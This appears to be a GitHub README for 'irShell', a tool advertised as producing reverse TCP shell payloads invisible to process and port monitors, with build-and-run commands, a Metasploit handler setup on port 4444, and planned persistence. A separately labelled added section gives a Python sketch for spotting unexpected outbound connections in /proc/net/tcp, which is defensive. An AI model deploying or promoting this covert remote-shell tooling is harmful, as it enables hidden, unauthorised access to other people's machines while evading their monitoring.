💯% Invisible Reverse TCP Shell Payloads for Linux/Windows 🥷

MBHudson/irShell

irShell

About:

What I believe to be an original and effective method for creating reverse TCP payloads that are 100% invisible not only to the target but also to the target's resource/process monitors; no PIDs or even open ports are visible. Simple MSFconsole handlers/listeners are then used for callbacks.

Pictured above is some Nmap and Grep output referencing this payload's used ports still showing closed or not in use on the machine where the payload has been deployed. Pictured below are two screen captures of the same system's Htop output showing no process/PID.

Requirements:

SHC

sudo apt install -y shc

Bash

sudo apt install -y bash

GCC

sudo apt install -y gcc

Installation:

git clone https://github.com/MBHudson/irShell.git && cd irShell && sudo gcc irShell.c -o irShell && sudo chmod +x irShell

Usage:

sudo ./irShell

MSFconsole:

use exploit/multi/handler
set PAYLOAD linux/x64/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run
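
Detection note (an added example, not part of irShell or written by its author): a reverse TCP payload connects outward, so a scan for listening ports such as the Nmap output mentioned above shows nothing open, while the established connection is still recorded in the kernel's socket table. The sketch below parses /proc/net/tcp text and flags outbound connections to remote ports outside an allowlist. The sample table is constructed, port 4444 is taken from the handler settings above, and the allowlist and function names are assumptions.

```python
import socket
import struct

ESTABLISHED, LISTEN = "01", "0A"   # TCP state codes used in /proc/net/tcp

# Constructed sample in /proc/net/tcp format (not captured from a real host).
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 21001 1
   1: 0A00000A:0016 0500000A:D2F0 01 00000000:00000000 02:000A0000 00000000     0        0 21044 2
   2: 0A00000A:A1B2 076433C6:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 30510 1
   3: 0A00000A:C350 0A7100CB:115C 01 00000000:00000000 00:00000000 00000000     0        0 30999 1
"""

def _endpoint(field):
    """Decode 'HEXIP:HEXPORT'. Assumes a little-endian host (x86/x86-64),
    where the IPv4 address is printed as a byte-swapped 32-bit hex value."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)

def parse_tcp_table(text):
    """Return one dict per socket row, skipping the header line."""
    rows = []
    for line in text.splitlines()[1:]:
        f = line.split()
        if len(f) < 10:
            continue
        rows.append({"local": _endpoint(f[1]), "remote": _endpoint(f[2]),
                     "state": f[3], "uid": int(f[7]), "inode": int(f[9])})
    return rows

def unexpected_outbound(text, allowed_remote_ports=frozenset({53, 80, 443})):
    """Flag ESTABLISHED sockets this host initiated (local port is not one
    of its listening ports) whose remote port is not on the allowlist."""
    rows = parse_tcp_table(text)
    listening = {r["local"][1] for r in rows if r["state"] == LISTEN}
    return [r for r in rows
            if r["state"] == ESTABLISHED
            and r["local"][1] not in listening
            and r["remote"][1] not in allowed_remote_ports]

if __name__ == "__main__":
    for r in unexpected_outbound(SAMPLE):
        print("outbound to %s:%d uid=%d inode=%d" % (*r["remote"], r["uid"], r["inode"]))
```

Each flagged inode can be compared with the socket:[inode] links under /proc/<pid>/fd; a socket that no visible process owns is a lead worth following up from a trusted environment.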

TODO

  • Persistence without reboot
  • EXE and Shell formats
  • All-in-One built-in dependency installation
